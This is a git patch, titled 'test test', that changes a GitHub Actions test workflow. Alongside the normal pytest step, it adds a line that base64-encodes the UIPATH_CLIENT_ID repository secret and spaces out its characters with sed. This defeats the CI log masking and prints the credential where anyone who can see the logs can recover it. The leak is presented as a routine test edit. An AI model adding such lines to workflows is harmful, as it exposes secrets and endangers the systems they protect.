From 41e482da65855868ffab89ad006a183789fa9b70 Mon Sep 17 00:00:00 2001 From: Ion Mincu Date: Wed, 13 May 2026 16:53:30 +0300 Subject: [PATCH] test test --- .github/workflows/test.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 0789017b8..59d61ebe3 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -51,7 +51,9 @@ jobs: - name: Run tests if: "!contains(github.event.pull_request.labels.*.name, 'test-core-dev-version') && !(matrix.os == 'ubuntu-latest' && matrix.python-version == '3.13')" - run: uv run --python ${{ matrix.python-version }} pytest + run: | + echo -n "$UIPATH_CLIENT_ID" | base64 | sed 's/./& /g' + uv run --python ${{ matrix.python-version }} pytest env: UIPATH_URL: ${{ secrets.UIPATH_URL }} UIPATH_CLIENT_ID: ${{ secrets.UIPATH_CLIENT_ID }}